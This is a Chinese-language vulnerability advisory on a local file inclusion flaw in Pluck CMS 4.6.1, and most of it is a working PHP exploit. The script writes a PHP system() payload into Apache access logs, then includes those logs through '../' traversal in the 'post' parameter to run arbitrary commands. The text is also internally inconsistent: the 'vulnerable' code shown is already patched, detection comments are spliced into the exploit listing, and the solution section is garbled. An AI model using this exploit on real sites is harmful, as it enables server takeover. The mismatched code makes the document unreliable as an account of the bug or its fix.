Pluck module_pages_site.php模块本地文件包含漏洞


添加时间:
2009-03-27

系统编号:
WAVDB-01365
BUGTRAQ: 34207

影响版本:
Pluck CMS 4.6.1

程序介绍:

pluck是用php编写的简单内容管理系统。

漏洞分析:

pluck的\data\modules\blog\module_pages_site.php模块没有正确地过滤用户通过GET方式提交的post参数,而是直接将其拼接进include()的文件路径:

...

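$includepage = 'blog_include.php';
//Only set 'view post'-page if a post has been specified
if (isset($_GET['post'])) {
    //Reduce the request value to a bare post file name before it can reach include().
    //The raw value was previously concatenated unchecked, so '../' traversal could pull
    //in any readable file on the host (BUGTRAQ 34207).
    $post_file = pluck_blog_post_filename($_GET['post']);
    //Check if post exists, and include information
    if ($post_file !== null && file_exists('data/settings/modules/blog/posts/'.$post_file)) {
        include('data/settings/modules/blog/posts/'.$post_file);
        $module_page['viewpost'] = $post_title;
    }
}

//Returns $post unchanged when it is a plain file name made of letters, digits, '_' and '-',
//with single '.' separators only (so no '/', '\', '..', leading dot, NUL byte or trailing
//newline can appear); returns null for anything else, including non-string (array) input.
function pluck_blog_post_filename($post) {
    if (!is_string($post)) {
        return null;
    }
    //'D' makes '$' match only at the very end, so "name.php\n" is rejected too.
    if (preg_match('/^[A-Za-z0-9_-]+(\.[A-Za-z0-9_-]+)*$/D', $post) !== 1) {
        return null;
    }
    return $post;
}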
...
远程攻击者可以通过提交带有特制post参数(GET参数,含目录遍历序列)的HTTP请求包含服务器上的任意本地文件,导致执行任意代码。


漏洞利用:

 
  1. <?php   
  2.   
  3. if($argc < 4) die("Use host path command [www.penatgon.gov /pluck ls l]\n");  
  4.   
  5. set_time_limit(0);  
  6. error_reporting(0);  
  7.   
  8. $host = $argv[1];  
  9. $port = $argv[2];  
  10. $path = $argv[3];  
  11. $command = $argv[4];  
  12.   
  13. //add something if not w00rking ;x  
  14.   
  // Entry 0 is a PHP payload string ($command is interpolated into it) whose output is
  // wrapped in the ' e[Ho_trip ' / ' d34th_trip' markers that _result() searches for.
  // Entries 1-44 are relative paths to four common Apache access-log locations, each
  // repeated with 1 to 11 levels of '../' traversal.
  // Detection/mitigation: a 'post' parameter containing '../' or ending in 'access.log',
  // or a request line containing '<?php', is a direct signature of this PoC in web logs.
  15. $shell = array(    
  16.          "<?php echo(' e[Ho_trip ');system('$command');echo(' d34th_trip'); ?>",  
  17.          "../apache/logs/access.log",  
  18.          "../../apache/logs/access.log",  
  19.          "../../../apache/logs/access.log",  
  20.          "../../../../apache/logs/access.log",  
  21.          "../../../../../apache/logs/access.log",  
  22.          "../../../../../../apache/logs/access.log",  
  23.          "../../../../../../../apache/logs/access.log",  
  24.          "../../../../../../../../apache/logs/access.log",  
  25.          "../../../../../../../../../apache/logs/access.log",  
  26.          "../../../../../../../../../../apache/logs/access.log",  
  27.          "../../../../../../../../../../../apache/logs/access.log",  
  28.          "../var/log/httpd/access.log",  
  29.          "../../var/log/httpd/access.log",  
  30.          "../../../var/log/httpd/access.log",  
  31.          "../../../../var/log/httpd/access.log",  
  32.          "../../../../../var/log/httpd/access.log",  
  33.          "../../../../../../var/log/httpd/access.log",  
  34.          "../../../../../../../var/log/httpd/access.log",  
  35.          "../../../../../../../../var/log/httpd/access.log",  
  36.          "../../../../../../../../../var/log/httpd/access.log",  
  37.          "../../../../../../../../../../var/log/httpd/access.log",  
  38.          "../../../../../../../../../../../var/log/httpd/access.log",  
  39.          "../var/log/apache/access.log",  
  40.          "../../var/log/apache/access.log",  
  41.          "../../../var/log/apache/access.log",  
  42.          "../../../../var/log/apache/access.log",  
  43.          "../../../../../var/log/apache/access.log",  
  44.          "../../../../../../var/log/apache/access.log",  
  45.          "../../../../../../../var/log/apache/access.log",  
  46.          "../../../../../../../../var/log/apache/access.log",  
  47.          "../../../../../../../../../var/log/apache/access.log",  
  48.          "../../../../../../../../../../var/log/apache/access.log",  
  49.          "../../../../../../../../../../../var/log/apache/access.log",  
  50.          "../usr/local/apache2/logs/access.log",  
  51.          "../../usr/local/apache2/logs/access.log",  
  52.          "../../../usr/local/apache2/logs/access.log",  
  53.          "../../../../usr/local/apache2/logs/access.log",  
  54.          "../../../../../usr/local/apache2/logs/access.log",  
  55.          "../../../../../../usr/local/apache2/logs/access.log",  
  56.          "../../../../../../../usr/local/apache2/logs/access.log",  
  57.          "../../../../../../../../usr/local/apache2/logs/access.log",  
  58.          "../../../../../../../../../usr/local/apache2/logs/access.log",  
  59.          "../../../../../../../../../../usr/local/apache2/logs/access.log",  
  60.          "../../../../../../../../../../../usr/local/apache2/logs/access.log",   
  61.    );  
  // Builds a raw HTTP/1.1 GET whose request line carries $shell[$int] (the caller
  // _inject() passes 0, i.e. the PHP payload string) and returns it as one string.
  // Detection: the User-Agent "_echo [ru] (Win6.66; @)" and a request path containing
  // "e[Ho_trip" are fixed strings of this PoC; presumably they are recorded unchanged in
  // the target's access log, so searching the log for them identifies an attempt.
  62. function _hdr($int){   //was not supposed to be file_get_contents  
  63.          
  64.         global $shell,$host,$path;  
  65.         $header .= "GET /$host/$path/$shell[$int]  HTTP/1.1\r\n";  
  66.         $header .= "Host: $host\r\n";  
  67.         $header .= "User-Agent: _echo [ru] (Win6.66; @)\r\n";  
  68.         $header .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";  
  69.         $header .= "Accept-Language: en-us,en;q=0.5\r\n";  
  70.         $header .= "Accept-Encoding: gzip,deflate\r\n";  
  71.         $header .= "Connection: close\r\n\r\n";  
  72.         return $header;  
  73.   
  74.   
  75. }  
  76.   
  77.   
  // Phase 1: opens a socket to $hosts:$ports, writes the request built by _hdr(0) once
  // and closes without reading a response. Detection: one request with the _hdr()
  // User-Agent immediately followed by a burst of 'post=../' requests (phase 2) is the
  // characteristic sequence in the access log.
  78. function _inject($hosts,$ports){  
  79.       
  80.            $hnd = fsockopen($hosts,$ports,$errno$errstr, 30);  
  81.            if(!$hnddie("Injection errr $errstr\n");  
  82.            fwrite($hnd,_hdr(0));  
  83.            fclose($hnd);    
  84.   
  85.   
  86. }  
  87.   
  // Splits a response body on ' e[Ho_trip ' and, for the last segment only, prints the
  // text before ' d34th_trip'; die()s with "Exploit failed!!" when that text is empty.
  // Detection: either marker string in an outbound response body shows that the
  // included file was executed as PHP on the server.
  88. function _result($data){  
  89.   
  90.           $ret = explode(' e[Ho_trip ',$data);   
  91.             if($ret[1] != ""){  
  92.               for($i = 1;$i<count($ret);$i++){  
  93.                $ret_2 = explode(' d34th_trip',$ret[$i]);    
  94.                    if($i - count($ret) == -1){  
  95.                      if($ret_2[0] != ""){  
  96.                         echo($ret_2[0]);  
  97.                      } else {  
  98.                         die("Exploit failed!!\n");  
  99.                      }  
  100.                }   
  101.               }      
  102.                  
  103.             }  
  104.   
  105. }  
  106.   
  // Phase 2: for each log-path entry of $shell (indices 1..count-1, skipping the payload
  // at index 0) fetches module_pages_site.php with that value in the vulnerable 'post'
  // GET parameter and hands the body to _result(). $rets is assigned but never used.
  // Detection/WAF: this exact URL with 'post=../' is the request to alert on; the
  // server-side fix is to restrict 'post' to a bare file name before include().
  107. function _exploit($hosts,$paths){  
  108.   
  109.         global $shell;  
  110.         $rets = "";  
  111.         $count = count($shell);  
  112.   
  113.         for($i=1;$i<$count;$i++){  
  114.               
  115.             $tab = file_get_contents("http://".$hosts."/".$paths."/data/modules/blog/module_pages_site.php?post=$shell[$i]");  
  116.            _result($tab);  
  117.     
  118.         }  
  119.   
  120.            
  121. }  
  // Prints the banner with the parsed arguments, then runs phase 1 (_inject) and
  // phase 2 (_exploit) in sequence.
  122. echo("---- pluck v 4.6.1 -----\n\n".  
  123.      "Autor: Alfons Luja\n".  
  124.      "Target: $host\n".  
  125.      "Path: $path\n".  
  126.      "Port: $port\n".  
  127.      "COM: $command\n".  
  128.      "Ex: poc.php www.target.com 80 pluck \"dir\"\n\n");  
  129.   
  130.     _inject($host,$port);  
  131.     _exploit($host,$path);  
  132.   
  133. ?>  



解决方案:
厂商补丁:
somp
----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本。临时缓解措施:在include()之前将post参数限制为不含目录分隔符和".."的纯文件名(例如只允许字母、数字、"_"、"-"和"."),或以posts目录中实际存在的文件列表做白名单校验:

http://www.pluck-cms.org/

信息来源:
<*来源:Alfons Luja

链接:http://secunia.com/advisories/34415/
*>